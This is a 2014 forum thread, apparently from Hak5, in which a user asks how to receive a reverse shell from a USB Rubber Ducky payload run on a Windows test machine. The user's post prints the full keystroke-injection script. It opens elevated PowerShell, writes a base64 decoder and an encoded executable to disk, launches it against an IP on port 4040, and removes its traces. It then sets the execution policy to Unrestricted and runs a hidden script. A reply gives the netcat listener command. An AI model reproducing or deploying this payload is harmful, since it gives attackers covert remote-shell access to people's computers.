sybo2 Posted August 21, 2014 Share Posted August 21, 2014 I used the ducky tool-kit web-page and created a .bin file with a reverse shell to my ip on port 4040. I then loaded the ducky into my test machine... it seems to have run... how do I view/see what’s on my test machine? Thanks for your help! Quote Link to comment Share on other sites More sharing options...
Guest spazi Posted August 21, 2014 Share Posted August 21, 2014 I'm sorry, I don't really understand the question. Can you be more specific? Quote Link to comment Share on other sites More sharing options...
sybo2 Posted August 21, 2014 Author Share Posted August 21, 2014 What kind of reverse shell did the ducky tool kit create? I have seen some samples on Hak5 of a reverse shell...they usually use Linux to access the test machine through the reverse shell... is that what is needed to gain remote admin on the test machine? Thanks for your reply. Quote Link to comment Share on other sites More sharing options...
Guest spazi Posted August 22, 2014 Share Posted August 22, 2014 (edited) no I was refering to :"how do I view/see what’s on my test machine?"But I think I understand your question now. You could be more specific about what OS is your victim pc is using? what OS does your attacker PC have?Well I don't know what script you are using, but I'm guessing it involves netcat if the test/target/victim machine is running linux. depends on your ducky script, but on your main/attacker machine you can type "nc -l [port number]" for instance "nc -l 4040" that makes netcat listen for any tcp connection on port 4040 and gives you a shell prompt. Now you can do what ever on the computer if you are Admin/root. That depends on the script. I'm guessing your script creates a tcp connection from your victim pc to your attacker pc. Edited August 22, 2014 by spazi Quote Link to comment Share on other sites More sharing options...
sybo2 Posted August 22, 2014 Author Share Posted August 22, 2014 i'm sorry both the attacker and victim machines are windows 64 bit 8.1 pro and the script that was run on the victims machine with the rubber ducky was generated at the ducktoolkit.com as shown below: I think that you do understand my question... how do i listen for/view the victims machine on my attacker machine. do I need to download netcat... does it run in windows... or should i be using KALI linux to run netcat. Thanks for your kind help. DELAY 750 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 750 ALT y DELAY 750 ENTER ALT SPACE DELAY 750 STRING m DELAY 750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $decoder = 'Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject("Scripting.FileSystemObject"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub' ENTER STRING $reverse = 'TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAAAADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAAAAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0AAHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hAWXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAAMAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNqkQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwFEVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtvKhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLpAOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNmMgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/AVXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7shwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzpbMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOYLmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B/7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBkSNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2Vsm0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAAAAxAAADpdL7//wAAAAIAAAAMQAAA' ENTER STRING Set-Content -Value $decoder -Path C:\decoder.vbs ENTER STRING Set-Content -Value $reverse -Path C:\reverse.txt ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING c:\reverse.exe 22.222.22.222 4040 *************(my host IP 22.222.22.222) (my host port 4040) ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 750 STRING C:\Windows\config-faa25.ps1 ENTER DELAY 750 ALT F4 DELAY 750 GUI r DELAY 750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 750 ALT y DELAY 750 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 750 STRING m DELAY 750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER Quote Link to comment Share on other sites More sharing options...
Guest spazi Posted August 23, 2014 Share Posted August 23, 2014 Personally I would use Kali or any linux distro on the attack machine, but that's just me. There is probably some program you can use on your windows machine, but I don't know which one.You don't have to install kali on your PC. You can put it on a usb pendrive and boot it from there. Especially if you are just messing around :) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.